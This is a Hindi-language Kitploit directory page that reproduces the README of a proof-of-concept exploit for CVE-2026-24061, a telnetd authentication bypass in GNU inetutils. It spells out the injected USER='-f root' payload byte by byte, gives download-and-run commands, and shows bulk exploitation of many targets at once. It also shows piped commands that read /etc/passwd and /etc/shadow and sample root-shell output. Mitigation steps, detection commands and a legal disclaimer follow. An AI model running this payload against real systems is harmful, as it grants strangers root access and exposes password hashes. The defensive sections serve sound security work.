Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-24061 — प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है। | Kitploit
उपकरण/GitHubGitHub/sh4den/cve-2026-24061
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरणपेपर और शोधलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubsh4den/cve-2026-24061

CVE-2026-24061

6132 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

प्रूफ ऑफ कॉन्सेप्ट: CVE-2026-24061 GNU inetutils-telnetd में एक गंभीर प्रमाणीकरण बाईपास भेद्यता है जो अनधिकृत दूरस्थ हमलावरों को दुर्भावनापूर्ण NEW_ENVIRON टेलनेट विकल्प शोषण के माध्यम से तुरंत रूट शेल एक्सेस प्राप्त करने की अनुमति देता है।

रिपॉजिटरी देखें

CVE-2026-24061

GNU inetutils-telnetd - दूरस्थ प्रमाणीकरण बाईपास

CVE-2026-24061 का शोषण करने के लिए एक सुरक्षा अनुसंधान उपकरण, जो GNU inetutils-telnetd में एक गंभीर दूरस्थ प्रमाणीकरण बाईपास भेद्यता है, जो बिना प्रमाणीकरण के तत्काल रूट शेल एक्सेस की अनुमति देता है।


विषय सूची

  • भेद्यता सारांश
  • प्रभावित संस्करण
  • तकनीकी विश्लेषण
  • आवश्यक शर्तें
  • स्थापना
  • उपयोग
  • आउटपुट संदर्भ
  • शोषण पद्धति
  • शमन और सुधार
  • समझौता के संकेत
  • कानूनी अस्वीकरण
  • संदर्भ
  • श्रेय

भेद्यता सारांश

कार्यकारी सारांश

GNU inetutils-telnetd में संस्करण 2.7 तक एक गंभीर भेद्यता मौजूद है जो अप्रमाणित दूरस्थ हमलावरों को प्रमाणीकरण को पूरी तरह से बायपास करने और तत्काल रूट शेल एक्सेस प्राप्त करने की अनुमति देती है। इस भेद्यता का शोषण NEW_ENVIRON टेलनेट विकल्प के माध्यम से एक विशेष रूप से तैयार USER पर्यावरण चर को मान "-f root" के साथ इंजेक्ट करके किया जाता है, जो सभी प्रमाणीकरण तंत्रों को बायपास कर देता है।

प्रभाव मूल्यांकन

  • गोपनीयता: सिस्टम डेटा का पूर्ण समझौता
  • अखंडता: रूट विशेषाधिकारों के साथ पूर्ण सिस्टम नियंत्रण
  • उपलब्धता: पूर्ण सिस्टम अधिग्रहण या सेवा से वंचित करने की संभावना
  • दायरा: अपरिवर्तित - शोषण केवल कमजोर टेलनेट सेवा को प्रभावित करता है

प्रभावित संस्करण

संस्करण श्रेणीस्थिति
<= 2.7कमजोर
> 2.7पैच स्थिति निर्धारित की जानी है (TBD)

तकनीकी विश्लेषण

भेद्यता का मूल कारण

यह भेद्यता telnetd के NEW_ENVIRON विकल्प हैंडलर में USER पर्यावरण चर के अनुचित सत्यापन से उत्पन्न होती है। NEW_ENVIRON टेलनेट विकल्प को संसाधित करते समय, telnetd सेवा USER चर मान को लॉगिन प्रक्रिया में भेजने से पहले सैनिटाइज करने में विफल रहती है। USER को "-f root" पर सेट करके, हमलावर कमांड-लाइन तर्क इंजेक्ट करता है जो बिना क्रेडेंशियल्स के रूट उपयोगकर्ता के लिए प्रमाणीकरण को सफल करने के लिए मजबूर करता है।

हमला वेक्टर

  1. हमलावर telnetd सेवा (आमतौर पर पोर्ट 23) से जुड़ता है
  2. टेलनेट विकल्प वार्ता के दौरान, सर्वर NEW_ENVIRON डेटा का अनुरोध करता है
  3. हमलावर USER पर्यावरण चर को "-f root" पर सेट करके प्रतिक्रिया देता है
  4. दुर्भावनापूर्ण तर्क प्रमाणीकरण जांच को बायपास कर देता है
  5. बिना किसी पासवर्ड प्रॉम्प्ट के तत्काल रूट शेल प्रदान किया जाता है
  6. पूर्ण सिस्टम समझौता प्राप्त होता है

शोषण जटिलता

  • आवश्यक शर्तें: लक्ष्य telnetd सेवा तक नेटवर्क पहुँच
  • प्रमाणीकरण: आवश्यक नहीं
  • उपयोगकर्ता सहभागिता: कोई नहीं
  • हमला जटिलता: कम

आवश्यक शर्तें

सिस्टम आवश्यकताएँ

  • Python 3.7 या उच्चतर
  • लक्ष्य telnetd इंस्टेंस के लिए नेटवर्क कनेक्टिविटी
  • Python स्क्रिप्ट निष्पादित करने के लिए पर्याप्त अनुमतियाँ

निर्भरताएँ

सभी निर्भरताएँ Python की मानक लाइब्रेरी का हिस्सा हैं:


स्थापना

विधि 1: Git का उपयोग करना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/sh4den/CVE-2026-24061.git
cd CVE-2026-24061

# शोषण चलाएँ
python3 main.py -u <target_ip>

विधि 2: प्रत्यक्ष डाउनलोड

root@kitploit:~
# शोषण डाउनलोड करें
curl -O https://raw.githubusercontent.com/sh4den/CVE-2026-24061/main/main.py

# इसे निष्पादन योग्य बनाएँ (Linux/macOS)
chmod +x main.py

# शोषण चलाएँ
python3 main.py -u <target_ip>

विधि 3: मैन्युअल स्थापना

root@kitploit:~
# सुनिश्चित करें कि Python 3.7+ स्थापित है
python3 --version

# डाउनलोड करें और चलाएँ
python3 main.py -u <target_ip>

उपयोग

कमांड लाइन इंटरफ़ेस

root@kitploit:~
Usage:
    python3 main.py -u <target_ip> [-p <port>] [-usr <user>]
    python3 main.py -l <targets_file> [-p <port>] [-usr <user>]
    echo "commands" | python3 main.py -u <target_ip>

Arguments:
    -u          एकल लक्ष्य IP पता या होस्टनाम
    -l          लक्ष्य IP वाली फ़ाइल का पथ (प्रति पंक्ति एक)
    -p          लक्ष्य पोर्ट (डिफ़ॉल्ट: 23)
    -usr        शोषण के लिए उपयोगकर्ता (डिफ़ॉल्ट: root)

एकल लक्ष्य शोषण

एकल telnetd इंस्टेंस का शोषण करें:

root@kitploit:~
# मूल शोषण (डिफ़ॉल्ट पोर्ट 23, उपयोगकर्ता root)
python3 main.py -u 192.168.1.100

# कस्टम पोर्ट
python3 main.py -u 192.168.1.100 -p 2323

# भिन्न उपयोगकर्ता
python3 main.py -u 192.168.1.100 -usr admin

कमांड निष्पादन मोड

गैर-इंटरैक्टिव रूप से कमांड निष्पादित करें:

root@kitploit:~
# एकल कमांड
echo "id; whoami; uname -a" | python3 main.py -u 192.168.1.100

# एकाधिक कमांड
echo "cat /etc/passwd; cat /etc/shadow" | python3 main.py -u 192.168.1.100

# आउटपुट रीडायरेक्शन के साथ कमांड
echo "ps aux > /tmp/processes.txt" | python3 main.py -u 192.168.1.100

बल्क लक्ष्य शोषण

फ़ाइल से एकाधिक लक्ष्यों का शोषण करें:

root@kitploit:~
python3 main.py -l targets.txt
python3 main.py -l targets.txt -p 2323
python3 main.py -l targets.txt -usr admin

लक्ष्य फ़ाइल प्रारूप (targets.txt):

root@kitploit:~
192.168.1.100
192.168.1.101
10.0.0.50
172.16.0.25
telnet.example.com

नोट्स:

  • प्रति पंक्ति एक लक्ष्य
  • IP पते या होस्टनाम
  • खाली पंक्तियों को अनदेखा किया जाता है
  • लक्ष्यों का शोषण थ्रेडिंग का उपयोग करके समवर्ती रूप से किया जाता है

आउटपुट संदर्भ

स्थिति संकेतक

नमूना आउटपुट

root@kitploit:~
╔═══════════════════════════════════════════════════════════════╗
║     CVE-2026-24061 - GNU inetutils-telnetd Auth Bypass        ║
║                                                               ║
║  CVSS Score: 9.8 (Critical)                                   ║
║  Impact: Remote Authentication Bypass - Instant Root Shell    ║
║                                                               ║
║          This tool is part of the HGrab Framework.            ║
╚═══════════════════════════════════════════════════════════════╝

[2026-01-23 14:32:15] [INFO] Target: 192.168.1.100:23, User: root
[2026-01-23 14:32:15] [SUCCESS] Connected to 192.168.1.100:23
[2026-01-23 14:32:15] [EXPLOIT] Sent payload: USER='-f root'
[2026-01-23 14:32:15] [INFO] Interactive mode - type commands

# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root

शोषण पद्धति

टेलनेट प्रोटोकॉल वार्ता प्रक्रिया

शोषण टेलनेट प्रोटोकॉल वार्ता चरण का लाभ उठाता है:

  1. प्रारंभिक कनेक्शन: लक्ष्य पोर्ट पर TCP कनेक्शन स्थापित होता है
  2. विकल्प वार्ता: सर्वर विभिन्न टेलनेट विकल्पों के लिए DO/WILL कमांड भेजता है
  3. TTYPE समझौता: क्लाइंट टर्मिनल प्रकार भेजने के लिए सहमत होता है (WILL TTYPE)
  4. TSPEED समझौता: क्लाइंट टर्मिनल गति भेजने के लिए सहमत होता है (WILL TSPEED)
  5. NEW_ENVIRON समझौता: क्लाइंट पर्यावरण चर भेजने के लिए सहमत होता है (WILL NEW_ENVIRON)
  6. उप-वार्ता: सर्वर पर्यावरण चर का अनुरोध करता है (SB NEW_ENVIRON SEND)
  7. पेलोड इंजेक्शन: क्लाइंट NEW_ENVIRON प्रतिक्रिया में USER="-f root" भेजता है
  8. प्रमाणीकरण बाईपास: सर्वर दुर्भावनापूर्ण USER चर को संसाधित करता है
  9. शेल एक्सेस: बिना प्रमाणीकरण के रूट शेल प्रदान किया जाता है

पेलोड संरचना

root@kitploit:~
# Telnet IAC (Interpret As Command) = 255
# SB (Subnegotiation Begin) = 250
# SE (Subnegotiation End) = 240
# NEW_ENVIRON option = 39

payload = bytes([
    255,        # IAC
    250,        # SB
    39,         # NEW_ENVIRON
    0,          # IS
    0,          # VAR
]) + b"USER" + bytes([1]) + b"-f root" + bytes([
    255,        # IAC
    240         # SE
])

इंटरैक्टिव सत्र प्रबंधन

  • इनपुट मल्टीप्लेक्सिंग: एक साथ सॉकेट और stdin निगरानी के लिए select.select() का उपयोग करता है
  • गैर-अवरोधक I/O: सॉकेट को गैर-अवरोधक संचालन के लिए कॉन्फ़िगर किया गया
  • टेलनेट प्रसंस्करण: साफ प्रदर्शन के लिए आउटपुट से IAC अनुक्रम हटा दिए जाते हैं
  • टाइमआउट प्रबंधन: कमांड निष्पादन के लिए 30 सेकंड का टाइमआउट

शमन और सुधार

तत्काल कार्रवाई

  1. telnetd अक्षम करें: telnetd सेवा को तुरंत रोकें और अक्षम करें

    root@kitploit:~
    # systemd-आधारित सिस्टम
    sudo systemctl stop telnetd
    sudo systemctl disable telnetd
    
    # xinetd-आधारित सिस्टम
    sudo service xinetd stop
    sudo chkconfig telnet off
    
  2. फ़ायरवॉल नियम: फ़ायरवॉल स्तर पर टेलनेट पोर्ट (23) को ब्लॉक करें

    root@kitploit:~
    # iptables
    sudo iptables -A INPUT -p tcp --dport 23 -j DROP
    
    # firewalld
    sudo firewall-cmd --permanent --remove-service=telnet
    sudo firewall-cmd --reload
    
  3. नेटवर्क अलगाव: इंटरनेट-फ़ेसिंग सिस्टम से टेलनेट सेवा हटाएँ

    • केवल आंतरिक नेटवर्क सेगमेंट का उपयोग करें
    • नेटवर्क एक्सेस कंट्रोल लिस्ट (ACL) लागू करें

दीर्घकालिक सिफारिशें

वैकल्पिक समाधान

टेलनेट के बजाय SSH का उपयोग करें:

root@kitploit:~
# OpenSSH सर्वर स्थापित करें
sudo apt-get install openssh-server  # Debian/Ubuntu
sudo yum install openssh-server      # RHEL/CentOS

# SSH सक्षम करें और प्रारंभ करें
sudo systemctl enable sshd
sudo systemctl start sshd

शमन के बाद सत्यापन

root@kitploit:~
# सत्यापित करें कि telnetd चल नहीं रहा है
sudo netstat -tlnp | grep :23
sudo ss -tlnp | grep :23

# यदि ठीक से अक्षम किया गया है तो कोई परिणाम नहीं लौटना चाहिए

समझौता के संकेत

लॉग विश्लेषण

निम्नलिखित पैटर्न के लिए सिस्टम लॉग की समीक्षा करें:

प्रमाणीकरण लॉग:

root@kitploit:~
# असामान्य लॉगिन पैटर्न की जाँच करें
sudo grep telnetd /var/log/auth.log
sudo grep telnetd /var/log/secure

# संदिग्ध USER पर्यावरण चर की तलाश करें
sudo grep "USER.*-f" /var/log/auth.log

नेटवर्क लॉग:

  • अप्रत्याशित IP पतों से टेलनेट कनेक्शन
  • सामान्य कार्य घंटों के बाहर पोर्ट 23 से कनेक्शन
  • टेलनेट सेवा से एकाधिक तीव्र कनेक्शन

सिस्टम कलाकृतियाँ

  • रूट के रूप में चल रही अप्रत्याशित प्रक्रियाएँ
  • संशोधित सिस्टम कॉन्फ़िगरेशन फ़ाइलें
  • अनधिकृत उपयोगकर्ता खाते
  • /root/.ssh/authorized_keys में नई SSH कुंजियाँ
  • संदिग्ध क्रॉन जॉब या निर्धारित कार्य

नेटवर्क संकेतक

  • टेलनेट सेवा प्रक्रिया से बाहरी आउटबाउंड कनेक्शन
  • बाहरी होस्ट को डेटा निष्कासन
  • रिवर्स शेल कनेक्शन
  • समझौता किए गए सिस्टम से उत्पन्न पोर्ट स्कैनिंग गतिविधि
  • अन्य आंतरिक सिस्टम में पार्श्व गति के प्रयास

पहचान कमांड

root@kitploit:~
# सक्रिय टेलनेट कनेक्शन की जाँच करें
sudo netstat -antp | grep :23

# हाल के रूट लॉगिन की समीक्षा करें
sudo last | grep root

# संशोधित सिस्टम फ़ाइलों की जाँच करें
sudo rpm -Va  # RHEL/CentOS
sudo debsums -c  # Debian/Ubuntu

# रूट द्वारा प्रक्रियाओं की सूची बनाएँ
sudo ps aux | grep root

# अनधिकृत SSH कुंजियों की जाँच करें
sudo cat /root/.ssh/authorized_keys

कानूनी अस्वीकरण

महत्वपूर्ण: उपयोग से पहले पढ़ें

यह उपकरण केवल इसके लिए प्रदान किया गया है:

  • अधिकृत सुरक्षा मूल्यांकन और पैठ परीक्षण
  • नियंत्रित वातावरण में शैक्षिक और अनुसंधान उद्देश्य
  • उचित प्राधिकरण के साथ रक्षात्मक सुरक्षा संचालन
  • उन सिस्टमों की भेद्यता मूल्यांकन जिनके आप स्वामी हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है

निषिद्ध उपयोग:

  • कंप्यूटर सिस्टम या नेटवर्क तक अनधिकृत पहुँच
  • स्वामी से स्पष्ट लिखित सहमति के बिना सिस्टम का शोषण
  • कोई भी गतिविधि जो स्थानीय, राज्य, संघीय या अंतर्राष्ट्रीय कानूनों का उल्लंघन करती है
  • दुर्भावनापूर्ण गतिविधियाँ या अनधिकृत सिस्टम समझौता

दायित्व: इस सॉफ़्टवेयर के लेखक, योगदानकर्ता और वितरक इस उपकरण के साथ किए गए दुरुपयोग, क्षति या अवैध गतिविधियों के लिए कोई जिम्मेदारी या देयता स्वीकार नहीं करते हैं। उपयोगकर्ता पूरी तरह से इसके लिए जिम्मेदार हैं:

  • सभी लागू कानूनों और विनियमों का अनुपालन सुनिश्चित करना
  • सुरक्षा परीक्षण करने से पहले उचित प्राधिकरण प्राप्त करना
  • इस सॉफ़्टवेयर के उपयोग या दुरुपयोग से उत्पन्न होने वाले किसी भी परिणाम

कानूनी सूचना: कंप्यूटर सिस्टम तक अनधिकृत पहुँच एक गंभीर आपराधिक अपराध है। उल्लंघन के परिणामस्वरूप इसके तहत अभियोजन हो सकता है:

  • कंप्यूटर धोखाधड़ी और दुरुपयोग अधिनियम (CFAA) - संयुक्त राज्य अमेरिका (18 U.S.C. § 1030)
  • कंप्यूटर दुरुपयोग अधिनियम 1990 - यूनाइटेड किंगडम
  • सूचना प्रणालियों के विरुद्ध हमलों पर यूरोपीय संघ का निर्देश
  • दुनिया भर के अन्य न्यायक्षेत्रों में समान विधान

दंड में कारावास, भारी जुर्माना और नागरिक देयता शामिल हो सकती है।

इस उपकरण का उपयोग करके, आप स्वीकार करते हैं कि आपने इस अस्वीकरण और सभी लागू कानूनों को पढ़ लिया है, समझ लिया है, और उनका पालन करने के लिए सहमत हैं।


संदर्भ

आधिकारिक संसाधन

  • GNU Inetutils होमपेज
  • GNU Inetutils दस्तावेज़ीकरण

भेद्यता जानकारी

  • NVD - CVE-2026-24061
  • MITRE CVE रिकॉर्ड
  • OpenWall प्रकटीकरण (20 जनवरी, 2026)
  • OpenWall चर्चा (20 जनवरी, 2026)
  • OpenWall अपडेट (22 जनवरी, 2026)

संबंधित दस्तावेज़

  • CWE-88: तर्क सीमांकक का अनुचित निष्प्रभावीकरण
  • टेलनेट प्रोटोकॉल विनिर्देश (RFC 854)
  • टेलनेट पर्यावरण विकल्प (RFC 1408)
  • OWASP कमांड इंजेक्शन

सुरक्षा सर्वोत्तम अभ्यास

  • रिमोट एक्सेस के लिए NIST दिशानिर्देश
  • CIS बेंचमार्क
  • SANS सुरक्षा संसाधन

श्रेय

  • शोषण लेखक: IRIS C2 टीम
  • फ्रेमवर्क: HGrab फ्रेमवर्क का हिस्सा
  • खोज: सुरक्षा अनुसंधान समुदाय
  • प्रकटीकरण: OpenWall मेलिंग सूची योगदानकर्ता

परिवर्तन लॉग

संस्करणतिथिपरिवर्तन
1.0.02026-01-23प्रारंभिक रिलीज़

सहायता और संपर्क

प्रश्नों, समस्याओं या योगदान के लिए:

  • समस्याएँ: GitHub Issues के माध्यम से बग रिपोर्ट करें या सुविधाओं का अनुरोध करें
  • सुरक्षा: अनुरक्षकों को जिम्मेदारी से भेद्यता रिपोर्ट करें
  • योगदान: पुल अनुरोधों का स्वागत है

लाइसेंस

यह प्रोजेक्ट केवल अधिकृत सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए यथावत प्रदान किया गया है। कोई वारंटी, व्यक्त या निहित नहीं है। अपने जोखिम पर और सभी लागू कानूनों और विनियमों के अनुसार उपयोग करें।

केवल उचित प्राधिकरण के साथ उपयोग करें

टूल डाउनलोड करें
फ़ील्डमान
CVE पहचानकर्ताCVE-2026-24061
CVSS v3.1 स्कोर9.8 (गंभीर)
CVSS वेक्टरCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE वर्गीकरणCWE-88: कमांड में तर्क सीमांकक का अनुचित निष्प्रभावीकरण
विक्रेताGNU परियोजना
उत्पादinetutils-telnetd
प्रकटीकरण तिथि20 जनवरी, 2026
पैच उपलब्धनिर्धारित किया जाना है (TBD)
पैकेजउद्देश्य
socketनेटवर्क संचार
selectI/O मल्टीप्लेक्सिंग
sysसिस्टम इंटरैक्शन
osऑपरेटिंग सिस्टम इंटरफ़ेस
threadingसमवर्ती लक्ष्य शोषण
datetimeटाइमस्टैम्प फ़ॉर्मेटिंग
संकेतकरंगविवरण
[SUCCESS]हरालक्ष्य से सफलतापूर्वक जुड़ा
[EXPLOIT]हराशोषण पेलोड सफलतापूर्वक भेजा गया
[INFO]नीलावर्तमान ऑपरेशन के बारे में सूचनात्मक संदेश
[ERROR]लालकनेक्शन विफलता, टाइमआउट, या शोषण त्रुटि
[WARNING]पीलाचेतावनी संदेश (वर्तमान में उपयोग नहीं किया गया)
कार्रवाईप्राथमिकताविवरण
SSH माइग्रेशनमहत्वपूर्णरिमोट एक्सेस के लिए टेलनेट को SSH से बदलें
पैच प्रबंधनमहत्वपूर्णसुरक्षा अपडेट की निगरानी करें और लागू करें
सेवा ऑडिटउच्चअनावश्यक नेटवर्क सेवाओं की पहचान करें और अक्षम करें
नेटवर्क विभाजनउच्चमहत्वपूर्ण सिस्टम को सार्वजनिक नेटवर्क से अलग करें
घुसपैठ का पता लगानामध्यमशोषण प्रयासों का पता लगाने के लिए IDS/IPS तैनात करें
एक्सेस नियंत्रणमध्यमरिमोट सेवाओं के लिए IP श्वेतसूची लागू करें